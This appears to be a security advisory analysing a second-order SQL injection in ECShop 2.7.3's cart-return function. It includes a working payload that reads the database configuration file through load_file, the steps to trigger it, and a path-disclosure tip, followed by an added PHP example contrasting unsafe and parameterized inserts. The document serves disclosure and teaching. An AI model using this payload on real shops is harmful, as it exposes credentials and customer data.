ECShop 2.73 lib_transaction.php second-order SQL injection vulnerability analysis

2014-01-03T00:00:00
ID MYHACK58:62201441643
Type myhack58
Reporter 蘑菇街
Modified 2014-01-03T00:00:00

Description

A second-order injection of the INSERT type; database administrator information can be read directly. Exploitation process: find a product to purchase and modify the value of the color radio button to:

    2'),('6', 'c4598c0015367d28cfcb267fffc750fd', '1 3', 'ECS000013', mid(load_file('C:/wamp/www/ec/data/config.php'),7 0,1 2 0), '1573.20', '1 2 0 0', '3', ", '1', ", '0', '0', '0', '2 1 7') – a


Then save, go to checkout, submit the order, go to the user center, find the order, open it, and click "Return to shopping cart".


The injection has now been triggered. We then go to the shopping cart and see the database information.

Affected version: ECShop_V2.7.3_UTF8_release1106
Login required: yes
Default configuration: yes
Exploit code available: yes

Vulnerability details: as a bonus, there is a path disclosure vulnerability that helps us obtain the physical location of the database configuration file: /install/templates/active.php

Analysis of the vulnerability cause: in \includes\lib_transaction.php, look at the following code in the function return_to_cart($order_id):

    // Return the goods to the shopping cart
    $return_goods = array(
        'goods_id'       => $row['goods_id'],
        'goods_sn'       => addslashes($goods['goods_sn']),
        'goods_name'     => addslashes($goods['goods_name']),
        'market_price'   => $goods['market_price'],
        'goods_price'    => $goods['goods_price'],
        'goods_number'   => $row['goods_number'],
        'goods_attr'     => empty($row['goods_attr']) ? '' : addslashes($row['goods_attr']),
        // goods_attr_id is taken from $row without addslashes(), unlike goods_attr above
        'goods_attr_id'  => empty($row['goods_attr_id']) ? '' : $row['goods_attr_id'],
        'is_real'        => $goods['is_real'],
        'extension_code' => addslashes($goods['extension_code']),
        'parent_id'      => '0',
        'is_gift'        => '0',
        'rec_type'       => CART_GENERAL_GOODS
    );
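The pattern behind this bug, shown as an added example that is not ECShop code: a value stored correctly at order time is read back and concatenated into a second INSERT, next to the parameterized form that treats the stored value as data. The schema, the sample value, the helper names (`return_to_cart_unsafe`, `return_to_cart_safe`, `cart_rows`) and the use of in-memory SQLite through PDO are assumptions made for illustration.

```php
<?php
// Added illustration: constructed schema and data; SQLite stands in for MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE order_goods (order_id INTEGER, goods_id INTEGER, goods_attr_id TEXT)");
$db->exec("CREATE TABLE cart (goods_id TEXT, goods_attr_id TEXT)");

// Step 1: order placement. The attribute value is bound, which is equivalent to
// correct escaping on input, so it is stored verbatim with its quote intact.
$attr = "2'),('9','injected";   // constructed, benign stand-in for a tampered value
$db->prepare("INSERT INTO order_goods VALUES (1, 6, ?)")->execute([$attr]);

// Step 2a: legacy pattern. The value read back from the database is trusted
// and concatenated into a new statement, so its quote closes the string literal.
function return_to_cart_unsafe(PDO $db, int $orderId): void {
    $st = $db->prepare("SELECT goods_id, goods_attr_id FROM order_goods WHERE order_id = ?");
    $st->execute([$orderId]);
    foreach ($st->fetchAll(PDO::FETCH_ASSOC) as $row) {
        $db->exec("INSERT INTO cart (goods_id, goods_attr_id) VALUES ('"
            . (int)$row['goods_id'] . "', '" . $row['goods_attr_id'] . "')");
    }
}

// Step 2b: hardened pattern. Stored data is treated as untrusted and bound
// as a parameter, so it can only ever be a column value.
function return_to_cart_safe(PDO $db, int $orderId): void {
    $st = $db->prepare("SELECT goods_id, goods_attr_id FROM order_goods WHERE order_id = ?");
    $st->execute([$orderId]);
    $ins = $db->prepare("INSERT INTO cart (goods_id, goods_attr_id) VALUES (?, ?)");
    foreach ($st->fetchAll(PDO::FETCH_ASSOC) as $row) {
        $ins->execute([(int)$row['goods_id'], $row['goods_attr_id']]);
    }
}

function cart_rows(PDO $db): int {
    return (int)$db->query("SELECT COUNT(*) FROM cart")->fetchColumn();
}

// Compare how many cart rows one order line produces under each pattern.
return_to_cart_unsafe($db, 1);
echo "unsafe: ", cart_rows($db), " cart row(s)\n";
$db->exec("DELETE FROM cart");
return_to_cart_safe($db, 1);
echo "safe:   ", cart_rows($db), " cart row(s)\n";
```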
